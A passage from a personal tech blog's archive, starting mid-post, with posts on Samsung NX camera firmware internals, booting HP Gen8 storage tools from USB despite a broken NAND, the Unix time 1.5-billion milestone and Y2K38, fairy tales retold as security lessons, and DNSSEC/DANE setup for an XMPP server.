In late 2014, Samsung released the high-end DRIMeV-based NX1, featuring a backside-illuminated 28 MP sensor and 4K H.256 video in addition to all the features of previous NX models. There was also an interview with a very excited Samsung Senior Marketing Manager that contains PCB shots and technical details. Once again, Linux is only mentioned in third-party coverage, e.g. in the EOSHD review.

Samsung NX500 (*)

In February 2015, the NX1 was followed by the more compact NX500 based around a slightly reduced DRIMeVs SoC. Apparently, the DRIMeVs also powers the Gear 360 camera, and indeed, there is a teardown with PCB shots confirming that and showing an additional MachXO3 FPGA, but also some firmware reverse-engineering as well as firmware mirroring efforts. The Gear360 is running Tizen 2.2.0 "Magnolia" and requires a companion app for most of its functions.

The NX1 is using the same modified version of the SLP firmware format as the Gear360. In versions before 1.21, the ext4 partitions were uncompressed, leading to significantly larger bin file sizes. They still contain Linux 3.5.0 but ext4 is a significant change over the UBIFS on the DRIMeIV cameras, and allows in-place modification from a telnet shell.

Android phones with dedicated photo co-processor

Samsung has also experimented with hybrid devices that are neither smartphone nor camera. The first such device seems to be the Galaxy Camera from 2012.

Samsung Galaxy K4 Zoom (*)

The Android firmware ZIP files (obtained from a Samsung "fan club" website) contain one or multiple tar.md5 files (which are tar archives with appended MD5 checksums to be flashed by Odin).

Galaxy Camera (EK-GC100, EK-GC120)

For the Galaxy Camera EK-GC100, there is a CODE_GC100XXBLL7_751817_REV00_user_low_ship.tar.md5 in the ZIP, that contains multiple .img files:

-rw-r--r-- se.infra/se.infra     887040 2012-12-26 12:12 sboot.bin
-rw-r--r-- se.infra/se.infra     768000 2012-12-26 11:41 param.bin
-rw-r--r-- se.infra/se.infra     159744 2012-12-26 12:12 tz.img
-rw-r--r-- se.infra/se.infra    4980992 2012-12-26 12:12 boot.img
-rw-r--r-- se.infra/se.infra    5691648 2012-12-26 12:12 recovery.img
-rw------- se.infra/se.infra 1125697212 2012-12-26 12:11 system.img

None of these look like camera firmware, but system.img is the Android rootfs (A sparse image convertible with simg2img to obtain an ext4 image). In the rootfs, /vendor/firmware/ contains a few files, including one fimc_is_fw.bin with 1.2MB.

The Galaxy Camera Linux source has an Exynos FIMC-IS (Image Subsystem) driver working over I2C, and the firmware itself contains a few interesting strings:

src\FIMCISV15_HWPF\SIRC_SDK\SIRC_Src\ISP_GISP_HQ_ThSc.c
* S5PC220-A5 - Solution F/W                    *
* since 2010.05.21 for ISP Team                  *
SIRC-ISP-SDK-R1.02.00
https://svn/svn/SVNRoot/System/Software/tcevb/SDK+FW/branches/Pegasus-2012_01_12-Release
"isp_hardware_version" : "Fimc31"

Furthermore, the firmware bin file seems to start with a typical ARM v7 reset vector table, but other than that it looks like the image processsor is a built-in component of the Exynos4 SoC.

Galaxy S4 Zoom: SM-C1010, SM-C101, SM-C105

Samsung Galaxy S4 Zoom (*)

The next Android hybrid released by Samsung was the Galaxy S4 Zoom (SM-C1010, SM-C101, SM-C105) in 2013. In its CODE_[...].tar.md5 firmware, there is an additional 2MB camera.bin file that contains the camera processor firmware. Binwalk only reveals a few FotoNation copyright strings, but strings gives some more interesting hints, like:

SOFTUNE REALOS/ARM is REALtime OS for ARM.COPYRIGHT(C) FUJITSU MICROELECTRONICS LIMITED 1999
M9MOFujitsuFMSL
AHFD Face Detection Library M9Mo v.1.0.2.6.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
LibFE M9Mo v.0.2.0.4
Copyright (c) 2005-2011 by FotoNation. All rights reserved.
FCGK02 Fujitsu M9MO

Softune is an IDE used by Fujitsu and Infineon for embedded processors, featuring the REALOS µITRON real-time OS!

M9MO sounds like a 9th generation Milbeaut image processor, but again there is not much to see without the model number, and it's hard to find good PCB shots without stickers. There is a S4 Zoom disassembly guide featuring quite a few PCB shots, but the top side only shows the Exynos SoC, eMMC flash and an Intel baseband. There are uncovered bottom pics submtted to FCC which are too low-res to identify if there is a dedicated SoC.

As shown above, Samsung has a history of working with Milbeaut and µITRON, so it's probably not a stretch to conclude that this combination powers the S4 Zoom's camera, but it's hard to say if it's a logical core inside the Exynos 4212 or a dedicated chip.

Galaxy NX: EK-GN100, EK-GN120

Samsung Galaxy NX (*)

Just one week after the S4 Zoom, still in June 2013, Samsung announced the Galaxy NX (EK-GN100, EK-GN120) with interchangeable lenses, 20.3MP APS-C sensor, and DRIMeIV SoC - specs already known from January's NX300.

But the Galaxy NX is also an Android 4.2 smartphone (even if it lacks microphone and speakers, so technically just a micro-tablet?). How can it be a DRIMeIV Linux device and an Android phone at the same time? The firmware surely will enlighten us!

Similarly to the S4 Zoom, the firmware is a ZIP file containing a [...]_HOME.tar.md5. One of the files inside it is camera.bin, and this time it's 77MB! This file now features the SLP\x00 header known from the NX300:

camera.bin: GALAXYU firmware 0.01 (D20D0LAHB01) with 5 partitions
           144    5523488   f68a86 ffffffff  vImage
       5523632       7356 ad4b0983 7fffffff  D4_IPL.bin
       5530988      63768 3d31ae89 65ffffff  D4_PNLBL.bin
       5594756    2051280 b8966d27 543fffff  uImage
       7646036   71565312 4c5a14bc 4321ffff  platform.img

The platform.img file contains a UBIFS root partition, and presumably vImage is used for upgrading the DRIMeIV firmware, and uImage is the standard kernel running on the camera SoC. The rootfs is very similar to the NX300 as well, featuring the same "squeeze/sid" string in /etc/debian_version, even though it's again Tizen / Samsung Linux Platform. There is a 500KB /usr/bin/di-galaxyu-app that's probably responsible for camera operation as well as for talking to the Android CPU. Further reverse engineering is required to understand what kind of IPC mechanism is used between the cores.

The Galaxy NX got the CES 2014 award for the first fully-connected interchangeable lens camera, but probably not for fully-connecting a SoC running Android-flavored Linux with a SoC running Tizen-flavored Linux on the same board.

Galaxy Camera 2

Shortly after the Galaxy NX, the Galaxy Camera 2 (EK-GC200) was announced and presented at CES 2014.

Very similar to the first Galaxy Camera, it has a 1.2MB /vendor/firmware/fimc_is_fw.bin file, and also shares most of the strings with it. Apart from a few changed internal SVN URLs, this seems to be roughly the same module.

Galaxy K Zoom: SM-C115, SM-C111, SM-C115L

As already identified above, the Galaxy K Zoom (SM-C115, SM-C111, SM-C115L), released in June 2014, is using the M7M image processor. The respective firmware can be found inside the Android rootfs at /vendor/firmware/RS_M7MU.bin and is 6.2MB large. It also features the same compression mechanism as the NX mini firmware, making it harder to analyze, but the M7MU firmware header looks more consistent:

Header Value
code_size 0x5dee12 (6155794)
offset_code 0x40000 (262144)
version1 "00.01"
log "201405289234"
version2 "D20FSHE"
model "06DAGCM2"

Rumors of unreleased models

During (and after) Samsung's involvement in the camera market, there were many rumors of shiny new models that didn't materialize. Here is an attempt to classify the press coverage without any insider knowledge:

  • Samsung NX-R (concept design, R for retro?), September 2012 - most probably an early name of the NX2000 (the front is very similar, no pictures of the back).

  • Samsung NX400 / NX400-EVF, July 2014 - looks like the NX400 was renamed to NX500, and an EVF version never materialized.

  • Samsung NX2 prototype, February 2018 - might be a joke/troll or an engineer having some fun. Three years after closing the camera department, it's hard to imagine that somebody produced a 30MP APS-C sensor out of thin air, added a PCB with a modern SoC to read it out, and created (preliminary) firmware.

  • Samsung NX Ultra, April 1st 2020, 'nuff said.

Conclusion

In just five years, Samsung released eighteen cameras and one smartphone/camera hybrid under the NX label, plus a few more phones with zoom lenses, built around the Fujitsu Milbeaut SoC as well as multiple generations of Samsung's custom-engineered (or maybe initially licensed from Fujitsu?) DRIM engine.

The number of different platforms and overlapping release cycles is a strong indication that the devices were developed by two or three product teams in parallel, or maybe even independently of each other. This engineering effort could have proven a huge success with amateur and professional photographers, if it hadn't been stopped by Samsung management.

To this day, the Tizen-based NX models remain the best trade-off between picture quality and hackability (in the most positive meaning).

Comments on HN


(*) All pictures (C) Samsung marketing material

Posted 2023-03-31 17:27 Tags:

This post describes how to start "Intelligent Provisioning" or the "HP Smart Storage Administrator (ACU / SSA)" on a Gen8 server with a broken NAND, so that you can change the boot disk order. It has been successfully tested on the HPE MicroServer Gen8 as well as on a ProLiant ML310e Gen8, using either a USB drive or a µSD / SD card with at least 1GB of capacity.

Update 2021-05-17: to consistently boot from an SSD in port 5, switch to Legacy SATA mode. See below for details.

iLO self-test error and SSA not working

Changing the Boot Disk

HP Gen8 servers in AHCI mode will always try to boot from the first disk in the (non-)hot-swap drive bay, and completely ignore the other disks you have attached.

The absolutely non-obvious way to change the boot device, as outlined in a well-hidden comment on the HP forum, is:

  • Change the SATA mode from "AHCI" to "RAID" in BIOS
    • Ignore the nasty red and orange warning about losing all your data
  • Boot into HP "Smart" Storage Administrator
  • Create a single logical disk of type RAID0
  • Add the desired boot device (and only it!) to the RAID0
  • Profit!

The disks in the drive bay will become invisible as boot devices / to your GRUB, but they will keep working as before under your operating system, and there seems to be no negative impact on the boot device either.

This is great advice, provided that you are actually able to boot into SSA (by pressing F5 at the right moment during your bootup process).

WARNING / Update 2020-10-07: apparently, booting from an SSD on the ODD port (SATA port 5) is not supported by HPE, so it is a pure coincidence that it is possible to set up, and your server will eventually forget the RAID configuration of the ODD port, falling back to whatever boot device is in the first non-hot-plug bay. This has happened to me on the ML310e, but not on the MicroServer (as reported in the forum) yet.

Update 2021-05-17: after another reboot-induced RAID config loss, I have done some more research and found this suggestion to switch to Legacy SATA mode. Another source in German. I have followed it:

  1. Reboot into BIOS Setup (press F9), switch to Legacy SATA
    • System Options
      • SATA Controller Options
        • Embedded SATA Configuration
          • SATA Legacy Support
  2. Reboot into BIOS Setup (press F9), switch boot controller Order
    • Boot Controller Order
      • Ctlr:2
  3. Optional 😉: shut down the box and swap the cables on ports 5 and 6.
  4. Profit!

My initial fear that the "Legacy" mode would cause a performance downgrade so far didn't materialize. The devices are still operated in the fastest SATA mode supported on the respective port, and NCQ seems to work as well.

The Error Message

However, for some time now, my HP MicroServer Gen8 has been showing one of those nasty NAND / Flash / SD-Card / whatever error messages:

  • iLO Self-Test reports a problem with: Embedded Flash/SD-CARD. View details on Diagnostics page.
  • Controller firmware revision 2.10.00 Partition Table Read Error: Could not partition embedded media device
  • Embedded Flash/SD-CARD: Embedded media initialization failed due to media write-verify test failure.
  • Embedded Flash/SD-CARD: Failed restart..

..or a variation thereof. I have ignored it because I thought it referred to the SD card and it didn't impact the server in noticeable ways.

At least not until I wanted to make the shiny new SSD that I bought the default boot device for the server, which is when I realized that neither the F5 key to run HP's "Smart" Storage Administrator tool, nor the F10 key for the "Intelligent" Provisioning tool (do you notice a theme on their naming?) had any effect on the boot process.

The "Official" Solution

The general advice from the Internet to "fix" this error is to repeat the following steps in random order, multiple times:

  • Disconnect mains power for some minutes
  • "Format Embedded Flash and reset iLO" from the iLO web interface
  • "Reset iLO" from the iLO web interface
  • Reset the CMOS settings from the F9 menu
  • Reset the iLO settings via mainboard jumpers
  • Downgrade iLO to 2.54
  • Upgrade iLO to the latest version
  • Send a custom XML via HPQLOCFG.exe

And once the error is fixed, to boot the Install Provisioning Recovery Media to put back the right data onto the NAND.

I've tried the various suggestions (except for the iLO downgrade, because the HTML5 console introduced in 2.70 is the only one not requiring arcane legacy browsers), but the error remained.

So I tried to install the provisioning recovery media nevertheless, but it failed with the anticipated "Error flashing the NVRAM":

Intelligent Provisioning screenshot: Error flashing the NVRAM

(it will not boot the ISO if you just dd it to an USB flash drive, but you can put it on a DVD or use the "Virtual Media" gimmick on a licensed iLO)

If none of the above "fixes" work, then your NAND chip is probably faulty indeed and thus the final advice given is:

  • Contact HPE for a replacement motherboard

However, my MicroServer is out of warranty and I'm not keen on waiting for weeks or months for replacement and shelling out real money on top.

Booting directly into SSA / IP

But that fancy HPIP171.2019_0220.23.iso we downloaded to repair the NAND surely contains what we need, in some heavily obfuscated form?

Let's mount it as a loopback device and find out!

# mount HPIP171.2019_0220.23.iso -o loop /media/cdrom/
# cd /media/cdrom/
# ls -al
total 65
drwxrwxrwx 1 root root  2048 Feb 21  2019 ./
drwxr-xr-x 5 root root  4096 Sep 11 18:41 ../
-rw-rw-rw- 1 root root 34541 Feb 21  2019 back.jpg
drwxrwxrwx 1 root root  2048 Feb 21  2019 boot/
-r--r--r-- 1 root root  2048 Feb 21  2019 boot.catalog
drwxrwxrwx 1 root root  2048 Feb 21  2019 efi/
-rw-rw-rw- 1 root root  2913 Feb 21  2019 font_15.fnt
-rw-rw-rw- 1 root root  3843 Feb 21  2019 font_18.fnt
drwxrwxrwx 1 root root  2048 Feb 21  2019 ip/
drwxrwxrwx 1 root root  2048 Feb 21  2019 pxe/
drwxrwxrwx 1 root root  6144 Feb 21  2019 system/
drwxrwxrwx 1 root root  2048 Feb 21  2019 usb/
# du -sm */
2   boot/
5   efi/
916 ip/
67  pxe/
30  system/
4   usb/
# ls -al ip/
total 937236
drwxrwxrwx 1 root root      2048 Feb 21  2019 ./
drwxrwxrwx 1 root root      2048 Feb 21  2019 ../
-rw-r-xr-x 1 root root 125913644 Feb 21  2019 bigvid.img.gz*
-rw-r-xr-x 1 root root 706750514 Feb 21  2019 gaius.img.gz*
-rw-r-xr-x 1 root root       114 Feb 21  2019 manifest.json*
-rw-rw-rw- 1 root root       140 Feb 21  2019 md5s.txt
-rw-rw-rw- 1 root root       164 Feb 21  2019 sha1sums.txt
-rw-r-xr-x 1 root root 127058868 Feb 21  2019 vid.img.gz*
# zcat ip/gaius.img.gz | file -
/dev/stdin: DOS/MBR boot sector

The ip directory contains the largest payload of that ISO, and all three .img.gz files look like disk images, with exactly 256MB (vid), 512MB (bigvid) and 1024MB (gaius) extracted sizes.

Following the "bigger is better" slogan, let's write the biggest one, gaius.img.gz to an USB flash drive and see what happens!

# # replace /dev/sdc below with your flash drive device!
# zcat gaius.img.gz |dd of=/dev/sdc bs=1M status=progress
... wait a while ...
# reboot

Then, on boot-up, select the "USB DriveKey" option:

HP MicroServer Gen8 Boot Menu

And you will be greeted by a friendly black & white GRUB loader, offering you "Intelligent" Provisioning and "Smart" Storage Administrator, which you can promptly and successfully boot:

HP IP / SSA Boot Loader

HP IP / SSA Welcome Screen

From here, you can create a single logical volume of type RAID0, add just your boot disk into it, restart and be happy!

Posted 2020-09-14 12:15

The Bill-and-a-half-ennium

Tonight (2017-07-14), at or around 02:40:00 GMT, the Unix time will have a value of 1 500 000 000 seconds, counting from January 1st, 1970. The last event of this kind, when Unix time reached 1 000 000 000 seconds, has been on September 9th, 2001, when the world still was a nice and good place. Because that was a billion seconds, some people incorrectly called it the "Billennium". Yours truly actually stayed up late enough (01:46 GMT) to celebrate the event with a hacker friend.

If you want to celebrate this special decimal representation of an arcane time measure, there is a nice countdown page!

The next one of this kind, 2 000 000 000, will be in 2033, so you better party hard this time!

The Year 2038 Problem (Y2K38)

This is also a good reminder of the many systems that are still using Unix time internally, and the legacy and embedded ones that store it in a 32-bit signed integer. Because this kind of integer overflows at 2 147 483 647, which will happen in 2038, all kinds of problems are expected.

There is already a great writeup on the current state of affairs regarding Y2K38 support, so instead of an in-depth technical analysis I'm going to provide a personal anecdote.

My first encounter with Y2K38 was in 2002 - a phone call from a relative who had trouble logging into an SSH server using PuTTY. It took some time to figure out the root cause - a dead CMOS battery in the PC led to incorrect clock values, bringing the machine far into the future, some time into the 2040ies.

Being a good citizen, I reported the bug to the developers (with a detailed explanation of the setup and a stack trace), and got a rather laconic answer:

Date: 11 Feb 2002 22:54:52
Subject: putty crashing on time() overflow

Georg Lukas writes:

putty is crashin with an access violation when you try to connect to a host and it is after time() goes over 232 (i.e. after Tue, 19 Jan 2038 04:14:07 +0100).

Thanks for the timely bug report. With a bit of luck we'll fix this one before it becomes a problem for too many users.

(S)

I haven't quite followed up, but recent versions of PuTTY, on a recent 64-bit Windows, don't exhibit this problem any more, so it looks like we are safe!

Future

While we still have a bit more than 20 years to fix Y2K38, I'm sure that there will be plenty of legacy 32-bit systems running when the date approaches. As with Y2K, there will be denial, anger, bargaining, depression and acceptance. And maybe a big boom that brings down the whole IT, however it might look in 20 years.

One way or the other, I will be a professional Y2K38 consultant with 36 years of working experience! Please contact me soon so I can ensure a timely retirement to some far-away island before day X! ;-)

Posted 2017-07-13 19:11

It is this time of the year again, and so we are proud to present a special revelation for Christmas!

The Brothers Grimm were not only academics, linguists, cultural researchers, lexicographers and authors, but also the world's first IT Security analysts. They wrote their so called fairy tales to document different kinds of security vulnerabilities, attacks and even some countermeasures. This article analyzes select examples and emphasizes the relevant lessons. Basic knowledge of the referenced stories is required to follow the analysis.

Rumpelstiltskin - A Badly Implemented Crypto Locker

Rumpelstiltskin, a typical script kiddie, lures the miller's daughter to install a crypto locker Trojan. Once she becomes the queen, the crypto locker makes her firstborn child inaccessible, providing a three-day unlock period.

Fortunately for the royal family, the implementation is flawed in two ways. Not only does it lack protection against brute force attacks, it also has a very weak password hard-coded into it.

The queen organizes for a massively parallel brute force attack, employing all of the kingdom's available system resources. Finally, she manages to guess the right password and is able to regain access to her firstborn.

Lessons:

  • Never install software from untrusted sources.
  • Do not use your username as your password.
  • Properly protect your system against brute-force attacks.

The Wolf and the Seven Young Goats - Outsourced Biometric Access Control Systems

The Big Bad Wolf is an obvious black-hat actor who wants to gain access to the goats' house. The mother goat, who needs to leave the home, has put into place a biometric access control system based on two factors: optical paw recognition and voice identification.

However, instead of deploying an implementation with known failure rate characteristics, she creates an insufficient requirements specification ("you will know him at once by his rough voice and his black feet.") and outsources the implementation to her kids, who do not have prior experience or formal education in the domain.

Besides of creating an implementation that uses too few biometric features to allow for a robust identification and authentication, the presented solution also exposes the exact cause of the authentication failure to the attacker ("[Our mother] has a soft, pleasant voice, but your voice is rough, you are the wolf." and "our mother has not black feet like you, you are the wolf."). This exposure of internal error causes allows the attacker to improve his approach and to succeed at the third attempt.

Lessons:

  • Take the time to properly specify security system requirements.
  • Do not outsource the development of mission-critical systems.
  • Only use biometrics as a supplementary mechanism to another access control system.
  • Do not expose internal error messages to potential attackers.
  • Properly protect your system against brute-force attacks.

Snow White - Social Media and Identity Theft

After hunting the young Snow White out of the family home, the queen stepmother is watching social media for signs of beautiful people (using a monitoring application called the "wonderful looking-glass"). She deploys a self-written face recognition algorithm that scans pictures tagged as #beautiful and returns a beauty index value (unfortunately, this detail is lost in the English translation. The German original reads "Aber Schneewittchen ist tausendmal schöner als Ihr." - "Snow White is a thousand times as beautiful as you are.").

Meanwhile Snow White, who is living in a safe house operated by the Seven Dwarfs charity organization, ignores the instructions to leave behind her social media presence, and posts geo-tagged selfies without properly scrubbing the metadata.

The queen's monitoring application notifies her of the newly analyzed pictures. Alerted by this, she obtains Snow White's geo-location from the pictures and performs a series of social engineering attacks. She uses stolen identity information from different sales representatives to successfully gain access to the safe house and to eventually poison Snow White.

Lessosn:

  • Stop using your social media when going undercover, no matter how hard it is.
  • Social engineering is very effective, and in most cases it is not sufficient to teach employees about it. Additional safeguards like double checking are needed.

Sleeping Beauty - Exploiting an Off-by-One Remote Vulnerability

The kingdom in question has thirteen IT security experts (which due to the lack of better wording in 1857 were called "the wise women"). One of them was not invited to the release party, so instead she performs an unsolicited penetration test. During her testing, she creates a specially-crafted message ("The king's daughter shall in her fifteenth year prick herself with a spindle, and fall down dead.") that exploits an off-by-one vulnerability in the dining service implementation.

Initially, the message was designed to crash the newly-forked child thread, but due to sand-boxing and ASLR techniques deployed by the twelfth' wise woman, the whole application gets suspended into the interactive debugging console instead. This event triggers an automatic firewall rule temporarily blocking all external access to the application.

Due to the lack of a monitoring system, the production service is down for a noticeable time ("asleep for a hundred years"), but eventually, a rock-star developer is found and hired (the "king's son"). He is able to circumvent the firewall and to access the server console. From there, he reconstructs the stack and is able to continue application execution, and they live contented to the end of their days.

Lessons:

  • Bug bounties are a good way to focus curiosity and to learn about vulnerabilities.
  • Production services should be properly monitored to detect downtime.

Have a nice holiday season and a merry new year!

Comments on HN

Posted 2016-12-22 18:25

.IM top-level domain Domain Name System Security Extensions Look-aside Validation DNS-based Authentication of Named Entities Extensible Messaging and Presence Protocol TLSA ("TLSA" does not stand for anything; it is just the name of the RRtype) resource record.

Okay, seriously: this post is about securing an XMPP server running on an .IM domain with DNSSEC, using yax.im as a real-life example. In the world of HTTP there is HPKP, and browsers come with a long list of pre-pinned site certificates for the who's'who of the modern web. For XMPP, DNSSEC is the only viable way to extend the broken Root CA trust model with a slightly-less-broken hierarchical trust model from DNS (there is also TACK, which is impossible to deploy because it modifies the TLS protocol, and also unmaintained).

Because the .IM TLD is not DNSSEC-signed yet, we will need to use DLV (DNSSEC Look-aside Validation), an additional DNSSEC trust root operated by the ISC (until the end of 2016). Furthermore, we will need to set up the correct entries for yax.im (the XMPP service domain), chat.yax.im (the conference domain) and xmpp.yaxim.org (the actual server running the service).

This post has been sitting in the drafts folder for a while, but now that DANE-SRV has been promoted to Proposed Standard, it was a good time to finalize the article.

Introduction

Our (real-life) scenario is as follows: the yax.im XMPP service is run on a server named xmpp.yaxim.org (for historical reasons, the yax.im host is a web server forwarding to yaxim.org, not the actual XMPP server). The service furthermore hosts the chat.yax.im conference service, which needs to be accessible from other XMPP servers as well.

In the following, we will create SRV DNS records to advertise the server name, obtain a TLS certificate, configure DNSSEC on both domains and create (signed) DANE records that define which certificate a client can expect when connecting.

Once this is deployed, state-level attackers will not be able to MitM users of the service simply by issuing rogue certificates, they would also have to compromise the DNSSEC chain of trust (in our case one of the following: ICANN/VeriSign, DLV, PIR or the registrar/NS hosting our domains, essentially limiting the number of states able to pull this off to one).

Creating SRV Records for XMPP

The service / server separation is made possible with the SRV record in DNS, which is a more generic variant of records like MX (e-mail server) or NS (domain name server) and defines which server is responsible for a given service on a given domain.

For XMPP, we create the following three SRV records to allow clients (_xmpp-client._tcp), servers (_xmpp-server._tcp) and conference participants (_xmpp-server._tcp on chat.yax.im) to connect to the right server:

_xmpp-client._tcp.yax.im       IN SRV 5 1 5222 xmpp.yaxim.org.
_xmpp-server._tcp.yax.im       IN SRV 5 1 5269 xmpp.yaxim.org.
_xmpp-server._tcp.chat.yax.im  IN SRV 5 1 5269 xmpp.yaxim.org.

The record syntax is: priority (5), weight (1), port (5222 for clients, 5269 for servers) and host (xmpp.yaxim.org). Priority and weight are used for load-balancing multiple servers, which we are not using.

Attention: some clients (or their respective DNS resolvers, often hidden in outdated, cheap, plastic junk routers provided by your "broadband" ISP) fail to resolve SRV records, and thus fall back to the A record. If you set up a new XMPP server, you will slightly improve your availability by ensuring that the A record (yax.im in our case) points to the XMPP server as well. However, DNSSEC will be even more of a challenge for them, so lets write them off for now.

Obtaining a TLS Certificate for XMPP

While DANE allows rolling out self-signed certificates, our goal is to stay compatible with clients and servers that do not deploy DNSSEC yet. Therefore, we need a certificate issued by a trustworthy member of the Certificate Extorion ring. Currently, StartSSL and WoSign offer free certificates, and Let's Encrypt is about to launch.

Both StartSSL and WoSign offer a convenient function to generate your keypair. DO NOT USE THAT! Create your own keypair! This "feature" will allow the CA to decrypt your traffic (unless all your clients deploy PFS, which they don't) and only makes sense if the CA is operated by an Intelligence Agency.

What You Ask For...

The certificate we are about to obtain must be somehow tied to our XMPP service. We have three different names (yax.im, chat.yax.im and xmpp.yaxim.org) and the obvious question is: which one should be entered into the certificate request.

Fortunately, this is easy to find out, as it is well-defined in the XMPP Core specification, section 13.7:

In a PKIX certificate to be presented by an XMPP server (i.e., a "server certificate"), the certificate SHOULD include one or more XMPP addresses (i.e., domainparts) associated with XMPP services hosted at the server. The rules and guidelines defined in [TLS‑CERTS] apply to XMPP server certificates, with the following XMPP-specific considerations:

  • Support for the DNS-ID identifier type [PKIX] is REQUIRED in XMPP client and server software implementations. Certification authorities that issue XMPP-specific certificates MUST support the DNS-ID identifier type. XMPP service providers SHOULD include the DNS-ID identifier type in certificate requests.

  • Support for the SRV-ID identifier type [PKIX‑SRV] is REQUIRED for XMPP client and server software implementations (for verification purposes XMPP client implementations need to support only the "_xmpp-client" service type, whereas XMPP server implementations need to support both the "_xmpp-client" and "_xmpp-server" service types). Certification authorities that issue XMPP-specific certificates SHOULD support the SRV-ID identifier type. XMPP service providers SHOULD include the SRV-ID identifier type in certificate requests.

  • [...]

Translated into English, our certificate SHOULD contain yax.im and chat.yax.im according to [TLS-CERTS], which is "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)", or for short RFC 6125. There, section 2.1 defines that there is the CN-ID (Common Name, which used to be the only entry identifying a certificate), one or more DNS-IDs (baseline entries usable for any services) and one or more SRV-IDs (service-specific entries, e.g. for XMPP). DNS-IDs and SRV-IDs are stored in the certificate as subject alternative names (SAN).

Following the above XMPP Core quote, a CA must add support adding a DNS-ID and should add an SRV-ID field to the certificate. Clients and servers must support both field types. The SRV-ID is constructed according to RFC 4985, section 2, where it is called SRVName:

The SRVName, if present, MUST contain a service name and a domain name in the following form:

_Service.Name

For our XMPP scenario, we would need three SRV-IDs (_xmpp-client.yax.im for clients, _xmpp-server.yax.im for servers, and _xmpp-server.chat.yax.im for the conference service; all without the _tcp. part we had in the SRV record). In addition, the two DNS-IDs yax.im and chat.yax.im are required recommended by the specification, allowing the certificate to be (ab)used for HTTPS as well.

Update: The quoted specifications allow to create an XMPP-only certificate based on SRV-IDs, that contains no DNS-IDs (and has a non-hostname CN). Such a certificate could be used to delegate XMPP operations to a third party, or to limit the impact of leaked private keys. However, you will have a hard time convincing a public CA to issue one, and once you get it, it will be refused by most clients due to lack of SRV-ID implementation.

And then there is one more thing. RFC 7673 proposes also checking the certificate for the SRV destination (xmpp.yaxim.org in our case) if the SRV record was properly validated, there is no associated TLSA record, and the application user was born under the Virgo zodiac sign.

Summarizing the different possible entries in our certificate, we get the following picture:

Name(s) Field Type Meaning
yax.im or chat.yax.im Common Name (CN) Legacy name for really old clients and servers.
yax.im
chat.yax.im
DNS-IDs (SAN) Required entry telling us that the host serves anything on the two domain names.
_xmpp-client.yax.im
_xmpp-server.yax.im
SRV-IDs (SAN) Optional entry telling us that the host serves XMPP to clients and servers.
_xmpp-server.chat.yax.im SRV-ID (SAN) Optional entry telling us that the host serves XMPP to servers for chat.yax.im.
xmpp.yaxim.org DNS-ID or CN Optional entry if you can configure a DNSSEC-signed SRV record but not a TLSA record.

...and What You Actually Get

Most CAs have no way to define special field types. You provide a list of service/host names, the first one is set as the CN, and all of them are stored as DNS-ID SANs. However, StartSSL offers "XMPP Certificates", which look like they might do what we want above. Let's request one from them for yax.im and chat.yax.im and see what we got:

openssl x509 -noout -text -in yaxim.crt
[...]
Subject: description=mjp74P5w0cpIUITY, C=DE, CN=chat.yax.im/emailAddress=hostmaster@yax.im
X509v3 Subject Alternative Name:
    DNS:chat.yax.im, DNS:yax.im, othername:<unsupported>,
    othername:<unsupported>, othername:<unsupported>, othername:<unsupported>

So it's othername:<unsupported>, then? Thank you OpenSSL, for your openness! From RFC 4985 we know that "othername" is the basic type of the SRV-ID SAN, so it looks like we got something more or less correct. Using this script (highlighted source, thanks Zash), we can further analyze what we've got:

Extensions:
  X509v3 Subject Alternative Name:
    sRVName: chat.yax.im, yax.im
    xmppAddr: chat.yax.im, yax.im
    dNSName: chat.yax.im, yax.im

Alright, the two service names we submitted turned out under three different field types:

  • SRV-ID (it's mising the _xmpp-client. / _xmpp-server. part and is thus invalid)
  • xmppAddr (this was the correct entry type in the deprecated RFC 3920 XMPP specification, but is now only allowed in client certificates)
  • DNS-ID (wow, these ones happen to be correct!)

While this is not quite what we wanted, it is sufficient to allow a correctly implemented client to connect to our server, without raising certificate errors.

Configuring DNSSEC for Your Domain(s)

In the next step, the domain (in our case both yax.im and yaxim.org, but the following examples will only list yax.im) needs to be signed with DNSSEC. Because I'm a lazy guy, I'm using BIND 9.9, which does inline-signing (all I need to do is create some keys and enable the feature).

Key Creation with BIND 9.9

For each domain, a zone signing key (ZSK) is needed to sign the individual records. Furthermore, a key signing key (KSK) should be created to sign the ZSK. This allows you to rotate the ZSK as often as you wish.

# create key directory
mkdir /etc/bind/keys
cd /etc/bind/keys
# create key signing key
dnssec-keygen -f KSK -3 -a RSASHA256 -b 2048 yax.im
# create zone signing key
dnssec-keygen -3 -a RSASHA256 -b 2048 yax.im
# make all keys readable by BIND
chown -R bind.bind .

To enable it, you need to configure the key directory, inline signing and automatic re-signing:

zone "yax.im" {
    ...
    key-directory "/etc/bind/keys";
    inline-signing yes;
    auto-dnssec maintain;
};

After reloading the config, the keys need to be enabled in BIND:

# load keys and check if they are enabled
$ rndc loadkeys yax.im
$ rndc signing -list yax.im
Done signing with key 17389/RSASHA256
Done signing with key 24870/RSASHA256

The above steps need to be performed for yaxim.org as well.

NSEC3 Against Zone Walking

Finally, we also want to enable NSEC3 to prevent curious people from "walking the zone", i.e. retrieving a full list of all host names under our domains. To accomplish that, we need to specify some parameters for hashing names. These parameters will be published in an NSEC3PARAMS record, which resolvers can use to apply the same hashing mechanism as we do.

First, the hash function to be used. RFC 5155, section 4.1 tells us that...

"The acceptable values are the same as the corresponding field in the NSEC3 RR."

NSEC3 is also defined in RFC 5155, albeit in section 3.1.1. There, we learn that...

"The values for this field are defined in the NSEC3 hash algorithm registry defined in Section 11."

It's right there... at the end of the section:

Finally, this document creates a new IANA registry for NSEC3 hash algorithms. This registry is named "DNSSEC NSEC3 Hash Algorithms". The initial contents of this registry are:

0 is Reserved.

1 is SHA-1.

2-255 Available for assignment.

Let's pick 1 from this plethora of choices, then.

The second parameter is "Flags", which is also defined in Section 11, and must be 0 for now (other values have to be defined yet).

The third parameter is the number of iterations for the hash function. For a 2048 bit key, it MUST NOT exceed 500. Bind defaults to 10, Strotman references 330 from RFC 4641bis, but it seems that number was removed since then. We take this number anyway.

The last parameter is a salt for the hash function (a random hexadecimal string, we use 8 bytes). You should not copy the value from another domain to prevent rainbow attacks, but there is no need to make this very secret.

$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yaxim.org
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yax.im

